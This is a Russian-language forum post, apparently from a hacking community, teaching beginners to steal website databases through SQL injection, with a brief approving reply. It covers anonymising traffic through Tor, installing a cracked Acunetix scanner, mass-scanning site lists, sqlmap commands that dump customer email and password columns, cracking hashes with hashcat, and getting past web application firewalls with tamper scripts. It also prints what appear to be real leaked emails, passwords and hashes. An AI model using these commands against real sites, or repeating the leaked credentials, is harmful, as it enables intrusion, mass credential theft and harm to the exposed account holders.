Сливаем БД с помощью SQL inj [Для новичков]

ฺฺฺฺฺฺBig Dick’n’son

Проверенный
13 Июл 2019
61
48
Перед тем как начать, обязательно к прочтению.



Для начала рекомендуется использовать Kali Linux, либо другие Linux, на крайняк Windows.
Ставим Kali Linux, у кого проблемы, смотрим видео
You must be registered for see medias

Linux можете ставить на флешку,виртуалку,основную ось (чего не рекомендую)
Kali Linux можно скачать на сайте разработчиков, но в ней обрезан рут, у меня сборка 2019 года.
После установки linux обновляем все пакеты.
apt update , apt upgrade , если у вас без рут добавляем sudo, должно получиться sudo apt update , sudo apt upgrade ставим пип на питон, он нам понадобиться для работы с питоновскими скриптами
apt-get install python-pip ,
apt-get install python3-pip ,
Если что-то не получается пробуйте так: sudo apt-get update sudo , apt install python3-pip --fix-missing Если всеравно не получаеться, есть гугл в конце концов, у каждого своя проблема может быть с установкой пип.
Не забываем предохраняться, устанавливаем либо впн либо тор.
Если про впн более-менее понятно, то расскажу про тор
Добавим возможность пускать весь трафик системы через сеть Tor:
sudo apt-get install tor
sudo systemctl start tor
git clone
cd toriptables2/
sudo mv toriptables2.py /usr/local/bin/
Теперь можно направить весь трафик через Tor, командой:
udo toriptables2.py -l

Чтобы отключить:

sudo toriptables2.py -f
Если вдруг возникла необходимость принудительно сменить IP:

sudo kill -HUP $(pidof tor)
Все надели резинку? идём дальше)
Раз у нас тут для начинающих, то бёрп и овасп зап мы не будем трогать, по хардкору пойдём устанавливаем окуня.
Качаем окуня


Сборка не моя, качаем на свой страх и риск, но у меня работает.

Заходим в папку с распакованным окунем, и открываем терминал с этого места
в терминале вводим chmod +x acunetix_13.0.200217097_x64_.sh
потом вводим ./acunetix_13.0.200217097_x64_.sh вводим название локал хоста,
вводим рандомную почту (Почту не забываем, она нам понадобится при авторизации)
осле этого копируем "wvsc" по пути /home/acunetix/.acunetix/v_200217097/scanner/
далее копируем этот файл license_info.json по этому пути /home/acunetix/.acunetix/data/license/
Все сделали? точно? а права раздавать я за вас буду что-ли? открываем терминал :
cd /home/acunetix/.acunetix/v_200217097/scanner/wvsc
chmod +x wvsc
Открываем мозилу и входим на локал хост если вводите как назвали его, у меня к примеру kali:3443/ название kali и порт 3443, логинимся, поздравляю у вас установлен окунь! Теперь пришло время грузить линки:
You must be registered for see images attach

По поводу линков, список должен быть в формате .csv
формат литнков:
,
,

Тут понятно? В конце каждого линка должна быть запятая, на последнем не обязательно. В ФАЙЛЕ НЕ БОЛЬШЕ 400 ЛИНКОВ!!!
Все добавили линки, переходим к скану.
Вкладка Scans>красная кнопка New Scan>нажимаем на полоску Filter>жмякаем Never Scanned> ставим галочки на сайтах которые нам нужны, сразу не добавляйте 50-100 а то ваша тачка сдохнет, добавляем штук 7-15 зависит от тачки если тачка более менее мощная то и 20 можно, но все зависит ещё от того где у вас ось если на виртуалке и вы не добавили ахулиард гб озу, то точно много добавлять не надо, если при установке на виртуалку вы поставили мало озу для неё то это можно изменить в настройках самой вирт тачки.
короче выбрали мы линки нажимаем на красную кнопку Scan.
Выпадает окно в вкладке scan type выбираем High Risk Vulnerabilities либо SQL Injection Vulnerabilities далее Create scan.
Все наши линки сканируются, результат ловим на странице Vulnerabilities либо на странице скана, нажимаем на понравившийся сайт и смотрим что выдало.
к примеру у нас выдало SQL Injection Vulnerabilities жмякаем и смотри какой параметр уязвим и метод, я нашего детского АДА нужно знать что уязвимости могут бить в таких параметрах GET POST и в заголовках к примеру хедерах , куках юзер агентах(это не весь список ещё) для работы с sqlmap (По позже перейдём к нему) И так смотрим:
You must be registered for see images attach

Что мы тут видим? уязвимость в юзер агенте, будем составлять команду для sqlmap, но для начала если ты не знаешь как ею пользоваться вот тебе ссылочки:
Справка по sqlmap на русском
Работа с GET параметрами
Работа с POST параметрами
залив юэкдора
Что много читать да? ну хоть про GET прочитай ленивая ты жопа, чтобы хоть понимал как мапу запустить)
И так прочитали? более менее вкурили? приступаем к созданию корманды для sqlmap
открываем терминал вводим
Код:
sqlmap -u "https://site.com/forgotpw.php" -p user-agent level 5 risk 3 --dbs
Что-же мы такое вводили здесь?
ключи:
-u дает понять мапе что после него идет линк
-p указывает мапе какой узвимый параметр
level 5 позволяет проверять заголовки, так как юзер агент в нем то ключ обязателен
risk 3 добавляет or и AND к пейлоаду (Не понятно что это? иди обратно, в начале есть ссылки) для начального уровня не обязательно знать но лучше это понимать.
--dbs Перечислить базы данных СУБД

И так звезды сошлись и мы не словили блок по вафу, получили бд
пример:
available databases [2]:
[*] information_schema
[*] site

Что из нового? --tables таблицы
нам нужно попасть в бд site так как в information_schema особо нету данных которых нам надо, мы сюда пришли за дампами маил пасс
команда:
Код:
sqlmap -u "https://site.com/forgotpw.php" -p user-agent level 5 risk 3 -D site --tables
И так что мы тут по на ввдили?
из нового у нас:
-D БД СУБД для перечисления
-T Таблица(ы) БД СУБД для перечисления
Что опять не понятно? ссылки все ещё на месте)
получили таблицы, пример:
Database: mycablemart
[2 tables]
+-----------------------------------+
| ds_admins |
| ds_customers |
+-----------------------------------+
Тут мы можем попытать удачу и вытащить админа и получить доступ к админке, но не в этой статье, сегодня мы дампим сайты с помощью sql инъекции
забыли про админа, нам нужно получить маил пасс, ввоим команду, пример:
Код:
sqlmap -u "https://site.com/forgotpw.php" -p user-agent level 5 risk 3 -D site -T ds_customers --columns
что из нового? --columns колонки (БД состоит из бд>таблицы>колонки)
Database: mycablemart
Table: ds_customers
[2 columns]
+--------------------+--------------+
| Column | Type |
+--------------------+--------------+
| cEmail | varchar(80) |
| cPass | varchar(15) |
+--------------------+--------------+

Мы нашли колонки с мылами и паролями, отлично!
Теперь нам надо как-товыкачать дамп, пишем команду, пример:
Код:
sqlma -u "https://site.com/forgotpw.php" -p user-agent level 5 risk 3 -D site -T ds_customers -С cEmail,cPass --dump
Что нового появилось в нашем запросе?
-C те же колонки, только после них через запятую идут колонки
--dump собствено дамп выбраных колонок
*может кто из молодёжи не понял:
--dbs -D это одно и тоже, только вот поправочка когда вы выбираете бд то нужно указать уже не --dbs , нужно указать -D , аналогично с таблицами и колонками

И так приступим к дампу! Пример:

| RBANDOV@OPTONLINE.NET | PBHPUZNA |
| abillmyer@bcps.org | eniraf |
| jake@captivatemedia.us | pyzcz1o@ng |
| eng28ine@gmail.com | ohvyqre28 |
| tomcat2000@hotmail.com | n10jnegubt |
| mgeorgeghobrial@yahoo.com | trbetr6366 |
| teck27@gmail.com | grpx7279 |
+-------------------------------------------------------------------------------+------------------+

[02:33:44] [INFO] table 'mycablemart.ds_customers' dumped to CSV file '/root/.sqlmap/output/site.com\dump\mycablemart\ds_customers.csv'
[02:33:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 49 times
[02:33:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site.com\dump\mycablemart'


Итак в конце мы видим наши строки маил пасс, и пути по которым мы можем перейти и забрать свой дамп.
Нам повезло и дамп не запаролен(хотя как сказать, если незапаролен то в 99% его уже слили)
Но что делать если мы сдампили и у нас в паролях какая-то хуйня?
пример:
neo.laurent.i@wanadoo.fr:5d8b49cc3b867b27795b34158193ce10b2254df7
None of your business.:ef9a61822dccfbf1a25aac1f5aa0a76d7c9b11f0
alias-site-comm@antp.be:3ef99383aedf61011f8ea8392ca1c16a53f20106
это называется хеш, в помощь нам приходит мой любимый hashcat
если хочешь научиться им пользоваться то тебе в помощь придут этих 2 видоса
You must be registered for see medias
You must be registered for see medias
Мы сдампили сто нам нужно,расшифровали если понадобилось.
Но стоять есть же ещё уязвимости в параметрах гет и пост
пример уязвимости в гет параметре
Код:
sqlmap -u "https://www.site.com/index.php?id=1" -p id --risk 3 --random-agent --dbs
Как мы видим, можно пробовать без высокого левела, но можно и добавить, а вдруг какая залётная скуля будет
тут особо ничего сверхъестественого нету, все как выше я показывал, только сейчас ещё добавился --random-agent с названия должно быть понятно что это рандомный юзер агент который берется из списка который есть в папке с мапой
с гетом все понятно ? нет? все линки выше, как я уже и говорил, если не понятно то нужно прочитать инфу там.

Переходим к параметру пост , пример команды:
Код:
sqlmap -u "https://www.site.com/login.php" --data="usrname=use&password=bhf" -p password --risk 3 --random-agent --dbs
Что мы видим тут? ну нас появился новый ключ --data через этот ключ вводятся данные с пост запроса
You must be registered for see images attach

С этим разобрались, мы научились сливать дампы с разными параметрами такие как пост гет и заголовки, мы выше сливали с помощью уязвимого параметра юзер агента, но это можно провернуть с любым заголовком, куки,хедер, реферер итд.
Но не всегда все так просто, иногда нам помогает терять нервные клетки ваф.
Вот словили мы всеми любимый ваф, что делать будем?
Многие говорят тут ничего не сделать и в 90% новички бросают линк, даже не начинают с ним войну.
Ребятки все не так сложно как кажется, есть много методов обойти ваф.
и так приступим:
На понадобиться
НЕ РЕКЛАМА


Вбиваем в поисковике наш сайт, не нашли на одном, ищем на втором.
итак нашли? и что дальше?
пример:
Код:
sqlmap -u "ip.ip.ip.ip/index.php?id=1" -p id --host="site.com"--risk 3 --random-agent --dbs
ip.ip.ip.ip это айпишник нашей цели
--host сюда вводим сам сайт
и все мы получаем доступ за клаудом, и легко пиздим все данные которые нам нужны

Но вот представим мы не нашли айпи, тогда в помощь нам придёт whatwaf
Установка:
копируем и вставляем в терминал
Код:
sudo -s << EOF
git clone https://github.com/ekultek/whatwaf.git
cd whatwaf
chmod +x whatwaf.py
pip install -r requirements.txt
./whatwaf.py --help
EOF
запускаем , переходим сначала в в папку с ватваф в терминале cd whatwaf
Код:
./whatwaf.py -u https://site.io
скрипт на выдал тампер который мы можем заюзать для обхода фильтрации, и та приступаем к мапе опять
пример:
Код:
sqlmap -u "https://www.site.com/login.php" --data="usrname=use&password=bhf" -p password --risk 3 --random-agent --tamper="apostrophemask.py" --dbs
( --tamper кто не понял, то через эту переменую нужно вводить тамперы)

Такс, вроде все нормально звёзды сошлись все гуд, но бывает так что ты вводишь название тампера, а мапа ругаеться на тебя "Э вася, ты попутал? я не знаю такого тампера"
ну так давайте подружим мапу с другими тамперами, а именно тамперы от whatwaf они шикарно работают с мапой.
Заходим в папку /root/whatwaf/content/tampers/
копируем все тамперы, и вставляем в папку /usr/share/sqlmap/tamper/ , и пропускаем тамперы которые уже есть в папке
все мапа дружит с другими тамперами)
Есть ещё такой скрипт как Atlas, тоже помогает обойти фильтрацию, но его тамперы не подходят для мапы их нужно переписывать.
Кому интересно то может поставить себе атлас.
По поводу обхода ваф, есть много способов, но я устану тут рассказывать про все это, например начиная с банальщины CloudFail и заканчивая Curl

Больше особо нечего рассказать для новичков, когда я начинал, а это было пол года назад! я и 1% этого всего не знал, все делал в слепую.
Парни не в коем случае не берите мои слова как основные, все нужно искать и изучать самому!
 
  • Like
Реакции: Elliot

Elliot

Read Only
FuckSociety
20 Июн 2020
79
10
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Годно
 
Комментарий